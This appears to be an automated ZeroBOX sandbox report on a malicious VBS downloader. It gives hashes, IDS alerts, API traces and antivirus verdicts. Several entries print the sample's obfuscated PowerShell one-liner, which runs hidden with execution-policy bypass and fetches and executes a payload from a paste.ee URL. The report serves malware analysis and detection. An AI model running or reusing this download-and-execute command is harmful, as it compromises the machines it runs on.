Summary | ZeroBOX

kiss.txt.vbs

Tags: Generic Malware, Antivirus, PowerShell
Category: FILE
Machine: s1_win7_x6402
Started: July 29, 2024, 4:48 p.m.
Completed: July 29, 2024, 4:51 p.m.
Size 8.3KB
Type ASCII text, with CRLF line terminators
MD5 e18a46ead29fa590d71256bca05fac76
SHA256 ddbf59d3594585e8755774c634fc88e318e1590bfdd9094b804fdacb91173ee7
CRC32 85A9EE11
ssdeep 192:GiFSTRuYgmY9CfjdUxdNGwpw3xb4FK+F8S7jXsaBZPk+oyRcaMu+JNeit7umGM8B:Z8bnK
Yara
  • Antivirus - Contains references to security software

Name Response Post-Analysis Lookup
paste.ee 172.67.187.200
IP Address Status Action
104.21.84.67 Active Moloch
164.124.101.2 Active Moloch

Suricata Alerts

Flow SID Signature Category
UDP 192.168.56.102:63709 -> 164.124.101.2:53 2054041 ET INFO Pastebin-like Service Domain in DNS Lookup (paste .ee) Misc activity
TCP 192.168.56.102:49164 -> 104.21.84.67:443 2034978 ET POLICY Pastebin-style Service (paste .ee) in TLS SNI Potential Corporate Privacy Violation
TCP 192.168.56.102:49164 -> 104.21.84.67:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow: TLSv1 192.168.56.102:49164 -> 104.21.84.67:443
Issuer: C=US, O=Google Trust Services, CN=WE1
Subject: CN=paste.ee
Fingerprint: db:ac:96:3c:aa:07:4d:6f:90:48:a6:34:79:1d:71:cf:4d:ef:d9:c2

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: IsPublic IsSerial Name BaseType
console_handle: 0x0000001b
1 1 0

WriteConsoleW

buffer: True True Byte[] System.Array
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: True True Byte[] System.Array
console_handle: 0x00000027
1 1 0

WriteConsoleW

buffer: True True Byte[] System.Array
console_handle: 0x0000002b
1 1 0

WriteConsoleW

buffer: Invoke-Expression : The '<' operator is reserved for future use.
console_handle: 0x0000003f
1 1 0

WriteConsoleW

buffer: At line:1 char:4
console_handle: 0x0000004b
1 1 0

WriteConsoleW

buffer: + IeX <<<< (NeW-OBJeCT NeT.WeBCLIeNT).DOWNLOADSTRING('https://paste.ee/d/9gCcH/
console_handle: 0x00000057
1 1 0

WriteConsoleW

buffer: + CategoryInfo : ParserError: (<:OperatorToken) [Invoke-Expressio
console_handle: 0x0000006f
1 1 0

WriteConsoleW

buffer: n], ParseException
console_handle: 0x0000007b
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : RedirectionNotSupported,Microsoft.PowerShell.Com
console_handle: 0x00000087
1 1 0

WriteConsoleW

buffer: mands.InvokeExpressionCommand
console_handle: 0x00000093
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004cbad0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004cb810
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004cb810
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004cb810
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004cb410
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004cb410
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004cb410
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004cb410
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004cb410
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004cb410
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004caf10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004caf10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004caf10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004cba10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004cba10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004cba10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004cb5d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004cba10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004cba10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004cba10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004cba10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004cba10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004cba10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004cba10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004cb8d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004cb8d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004cb8d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004cb8d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004cb8d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004cb8d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004cb8d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004cb8d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004cb8d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004cb8d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004cb8d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004cb8d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004cb8d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004cb8d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004cb050
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004cb050
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x06129900
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x06129900
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x06129900
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x06129900
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x06129900
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x06129900
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features: GET method with no useragent header
suspicious_request: GET https://paste.ee/d/9gCcH/0
request: GET https://paste.ee/d/9gCcH/0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 851968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02620000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2276
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x722d1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01eaa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2276
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x722d2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01ea2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01ff2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0262a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01ff3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01ff4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0263b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02637000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01eab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02622000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02635000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01ff5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0262c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02890000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01ff6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0263c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02623000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02624000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02625000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02626000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02627000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02628000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02629000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a80000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a81000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a82000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a83000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a84000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a85000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a86000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a87000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a88000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a89000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a8a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a8b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a8c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a8d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a8e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a8f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a90000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a91000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a92000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a93000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2276
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a94000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''https://paste.ee/d/9gCcH/0'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
cmdline "C:\Windows\System32\cmd.exe" /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''https://paste.ee/d/9gCcH/0'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
cmdline Cmd.exe /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''https://paste.ee/d/9gCcH/0'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: Cmd.exe
parameters: /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''https://paste.ee/d/9gCcH/0'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
filepath: Cmd.exe
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received: TLS server records (ServerHello, certificate chain and encrypted application data; raw bytes not reproduced here). Readable fields from the certificate chain: leaf certificate CN=paste.ee with SAN entries paste.ee and *.paste.ee, validity 240622144918Z to 240920144917Z, issued by C=US, O=Google Trust Services, CN=WE1; WE1 issued by C=US, O=Google Trust Services LLC, CN=GTS Root R4 (validity 231213090000Z to 290220140000Z); GTS Root R4 cross-signed by C=BE, O=GlobalSign nv-sa, OU=Root CA, CN=GlobalSign Root CA (validity 231115034321Z to 280128000042Z). AIA and CRL URLs embedded in the chain: http://o.pki.goog/s/we1/rfo, http://i.pki.goog/we1.crt, http://c.pki.goog/we1/t4Y_tS4oQ9A.crl, http://i.pki.goog/r4.crt, http://c.pki.goog/r/r4.crl, http://i.pki.goog/gsr1.crt, http://c.pki.goog/r/gsr1.crl
Data sent: TLS ClientHello carrying the SNI paste.ee, followed by two encrypted records (raw bytes not reproduced here; the three send() calls below record their sizes as 112, 134 and 101 bytes)
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
Symantec ISB.Downloader!gen80
ESET-NOD32 PowerShell/Runner.A suspicious
Avast Script:SNH-gen [PUP]
Kaspersky HEUR:Trojan.VBS.Alien.gen
Rising PUF.Runner/PS!8.188C4 (TOPIS:E0:V57SxEang5G)
Ikarus Trojan.PowerShell.Agent
Google Detected
ZoneAlarm HEUR:Trojan.VBS.Alien.gen
Varist VBS/Agent.BOL!Eldorado
huorong TrojanDownloader/PS.NetLoader.fk
AVG Script:SNH-gen [PUP]
Time & API Arguments Status Return Repeated

send

buffer: kgf§Ic&>ãLϞ*ÝW¾Ó±ª!Haø1ˆz:{\¶ /5 ÀÀÀ À 28&ÿ paste.ee  
socket: 1396
sent: 112
1 112 0

send

buffer: FBAºð5˜é¿Sè]ól‰ýUf ü1Ã4³Dó¯ùñ-›°ú”¹`%˝atÃBhœ0º|›ätnÔ§ŸËÝ3Ú0Û(+Ý_{wn$ ù=Qã¦îõîzo¡*äT×b³ºVŠûëìGzã•,°
socket: 1396
sent: 134
1 134 0

send

buffer: `©+ys*&H>¡'<> vÓoR[ç‹=©öå äK?n¡ÖkõӖ!öqmgçßì´aיéÂn½u¥‡¬ïÏݳþ¼1°У Œ<± ÅÆÈÐQM@²ɞAMÔªŠí';
socket: 1396
sent: 101
1 101 0
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''https://paste.ee/d/9gCcH/0'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
